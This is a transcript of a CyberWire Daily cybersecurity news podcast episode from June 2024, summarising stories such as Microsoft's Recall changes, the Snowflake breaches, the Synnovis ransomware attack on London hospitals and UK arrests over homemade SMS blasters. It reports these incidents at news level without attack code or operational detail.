The CyberWire Daily Podcast 6.10.24
Ep 2085 | 6.10.24

Rethinking recalls.


Microsoft makes Recall opt-in. The Senate holds hearings on federal cybersecurity standards. Snowflake’s scrutiny snowballs. New York Times source code is leaked online. Ransomware leads to British hospitals' desperate need for blood donors. Cisco Talos finds 15 serious vulnerabilities in PLCs. Sticky Werewolf targets Russia and Belarus. Frontier Communications warns 750,000 customers of a data breach. Chinese nationals get prison time in Zambia for cybercrimes. N2K’s CSO Rick Howard speaks with Danielle Ruderman, Security GTM Leader, AWS about what keeps CISOs up at night. DIY cell towers can land you in hot water.

Today is Monday, June 10th, 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Microsoft makes Recall opt-in. 

Microsoft announced significant changes to its Recall feature after receiving criticism from cybersecurity and privacy communities. Recall, which captures screenshots of users' activities every five seconds for AI analysis, will now be opt-in instead of default on Copilot+ compatible Windows versions. This change aims to give users more control over their data.

Pavan Davuluri, Microsoft’s corporate VP for Windows and devices, stated in a blog post that the setup experience for Copilot+ PCs will now clearly allow users to choose whether to enable Recall. If not chosen, it will remain off.

Experts have criticized Recall as potential spyware, as it could silently store sensitive information like bank logins and passwords. While this data is stored locally and not uploaded to the cloud, it could still be accessed by hackers gaining temporary access to the device.

To address security concerns, Microsoft will also introduce measures to better protect Recall data. Users will need to authenticate via Microsoft Hello, using a PIN or biometric check, to enable or access Recall. This data will remain encrypted until the user authenticates.

Despite these changes, privacy issues remain. Users who enable Recall may still be vulnerable to domestic abusers demanding PINs or legal actions that compel them to hand over their data.

The Senate holds hearings on federal cybersecurity standards. 

Senator Gary Peters, a Michigan Democrat and chair of the Homeland Security and Governmental Affairs Committee, held a hearing last Friday to address federal cybersecurity standards and the challenges businesses face in meeting them. The hearing emphasized the need for Congress to pass legislation for a cohesive approach to cybersecurity regulations. Nicholas Leiserson from the Office of the National Cyber Director (ONCD) and David Hinchman from the Government Accountability Office discussed the difficulties in harmonizing these standards and their impact on businesses.

Witnesses highlighted the burdens of multiple cybersecurity standards and the need for streamlined regulations. Peters advocated for a Harmonization Committee to coordinate efforts. Leiserson pointed out that the National Cybersecurity Strategy and National Security Memorandum prioritize regulatory harmonization. The ONCD is developing a reciprocity framework for cybersecurity standards to reduce duplication and improve efficiency. Congress's role in enacting this legislation is crucial for a unified response to cyber threats.

Snowflake’s scrutiny snowballs. 

Cloud provider Snowflake is facing increasing scrutiny following a series of customer data thefts. Initially linked to Ticketmaster's breach, now LendingTree's subsidiary, QuoteWizard, also confirmed data was stolen from Snowflake. Snowflake attributed these breaches to customers not using multi-factor authentication (MFA), which it does not enforce by default.

Snowflake acknowledged a former employee's demo account was compromised due to single-factor authentication. Despite notifying affected customers, Snowflake has not disclosed the number of impacted clients, though it has over 9,800 customers. Critics argue Snowflake should enforce MFA and reset passwords proactively. The company says they plan to require advanced security controls like MFA in the future but has not provided a specific timeline.

New York Times source code is leaked online. 

Internal source code and data from The New York Times were leaked on the 4chan message board after being stolen from GitHub repositories in January 2024. An anonymous user posted a torrent of a 273GB archive containing the stolen data, which includes source code, IT documentation, and infrastructure tools. The leak was discovered by VX-Underground and confirmed by The Times to BleepingComputer.

The breach occurred due to exposed credentials for a third-party code platform. The Times stated there was no unauthorized access to its internal systems or impact on operations. This incident follows another leak on 4chan of Disney's internal documents, though it is unclear if the same person is responsible for both breaches.

Ransomware leads to British hospitals' desperate need for blood donors. 

A ransomware attack on British pathology services vendor Synnovis has disrupted blood matching in multiple London hospitals. The National Health Service (NHS) urgently seeks O positive and O negative blood donors to address the issue. This June 3 attack has delayed surgeries, organ transplants, and other procedures, as hospitals cannot match patients' blood types as usual.

In response, the NHS plans to use O type blood universally for safety. They aim to fill 13,000 O type blood donor slots immediately, with 3,400 needed in London. The attack, linked to Russian-speaking ransomware groups, has been described as a highly impactful cyber incident. The NHS cybersecurity team is still assessing the full extent of the attack.

Cisco Talos finds 15 serious vulnerabilities in PLCs. 

Cisco’s Talos unit found 15 vulnerabilities in AutomationDirect's Productivity series PLCs, classified as ‘high’ or ‘critical’ severity. These flaws can enable remote code execution or denial-of-service attacks, risking costly industrial disruptions. Although typically not exposed to the internet, about 50 devices might be online, as shown by a Shodan search. AutomationDirect released updates and recommendations to address these issues. The US cybersecurity agency CISA informed organizations of these vulnerabilities in late May.

Sticky Werewolf targets Russia and Belarus. 

Morphisec researchers observed the threat actor Sticky Werewolf targeting entities in Russia and Belarus, including public organizations, a pharmaceutical company, and a microbiology research institute. Initially detected in April 2023, Sticky Werewolf recently targeted the aviation industry with emails supposedly from AO OKB Kristall’s deputy director.

In this campaign, they used phishing emails with archive attachments containing LNK files pointing to a WebDAV server. Once executed, these files run a batch script, leading to an AutoIt script that injects the final payload. The malware used includes Rhadamanthys Stealer and Ozone RAT, facilitating espionage and data exfiltration. Although the group's origin is uncertain, there are possible links to pro-Ukrainian cyberespionage activities.

Frontier Communications warns 750,000 customers of a data breach. 

Frontier Communications is warning 750,000 customers of a data breach following an April cyberattack by the RansomHub ransomware group. The breach exposed personal information, including full names and Social Security Numbers, but not financial information. The company has informed regulatory authorities and implemented additional security measures. Affected customers are advised to enroll in free credit monitoring and identity theft services provided by Kroll. RansomHub has threatened to leak 5GB of stolen data if Frontier does not respond by June 14.

Chinese nationals get prison time in Zambia for cybercrimes. 

A Zambian court sentenced 22 Chinese nationals to prison terms ranging from seven to 11 years for cybercrimes, including internet fraud and online scams targeting Zambians and individuals from Singapore, Peru, and the UAE. They were also fined between $1,500 and $3,000. A Cameroonian was similarly sentenced. The group was part of a 77-member syndicate arrested in April for a sophisticated internet fraud scheme. Authorities seized over 13,000 SIM cards, firearms, and ammunition from the Chinese-run Golden Top Support Services in Lusaka. The syndicate employed unsuspecting Zambians to conduct deceptive conversations using various platforms.



We’ll be right back. After the break, N2K’s CSO Rick Howard speaks with Danielle Ruderman, Security GTM Leader, AWS about what keeps CISOs up at night and learnings from AWS CISO Circles. 

Welcome back. You can catch more with Rick and the N2K team at AWS’ Re:Inforce event happening this week.

DIY cell towers land two in the UK in hot water. 

And finally, British police nabbed two individuals for operating homemade DIY cell towers, used to send phishing texts. These "text message blasters" cleverly dodged network anti-smishing controls, spamming thousands with fake messages posing as banks and other official entities.

British law enforcement authorities noted the increasing cunning of cybercriminals, reminding everyone that legitimate organizations won’t ask for personal info via text. To counter this, UK networks have a handy scheme: forward suspicious texts to them for analysis and potential blocking.

Huayong Xu, 32, was arrested in Croydon and faces fraud charges, while another unnamed individual was arrested in Manchester. Authorities, including Ofcom and the NCSC, are investigating, but details are sparse due to the sensitive nature of the tactics involved.

It's suspected these devices could be IMSI catchers, popularly known as Stingrays, sometimes used by law enforcement for intercepting communications by spoofing legitimate cell towers. 

There’s no word on how exactly the suspects were tracked down, but being a long time admirer of HAM radio enthusiasts, part of me hopes that it was an old fashioned fox hunt. 

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.



And that’s the CyberWire.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at


This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.